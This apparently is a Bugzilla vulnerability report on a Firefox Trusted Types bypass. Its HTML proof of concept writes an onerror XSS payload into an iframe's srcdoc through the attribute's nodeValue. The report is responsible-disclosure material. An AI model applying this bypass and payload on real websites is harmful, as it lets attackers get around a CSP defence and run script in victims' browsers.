Bugzilla

Summary:
A vulnerability in Mozilla Firefox's implementation of Trusted Types (TT) allows bypassing this critical DOM XSS mitigation feature. The TT security policy fails to block the injection of unsafe HTML when modifying the security-sensitive srcdoc attribute indirectly via its underlying DOM Node properties (nodeValue or textContent). This allows attackers to achieve DOM XSS on websites protected by a strict TT Content Security Policy (CSP), effectively neutralizing the policy's defense against XSS.
Steps To Reproduce:
Create an HTML file with the following code:
Code
```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="Content-Security-Policy" content="require-trusted-types-for 'script'; trusted-types 'none';">
</head>
<body>
  <iframe srcdoc="test" id="frame1"></iframe>
  <script>
    // This assignment must be blocked by Trusted Types, but it executes in Firefox.
    frame1.attributes.srcdoc.nodeValue='<img src=x onerror=alert(origin)>';
  </script>
</body>
</html>
```
Open the file in Mozilla Firefox
Observe that the XSS payload (<img src=x onerror=alert(origin)>) is parsed and executed within the iframe, confirming a TT policy bypass
Supporting Material/References:
Related Issue: This vulnerability is structurally similar to a previously patched flaw in the Chromium engine:
Chromium Bug: https://issues.chromium.org/issues/40058798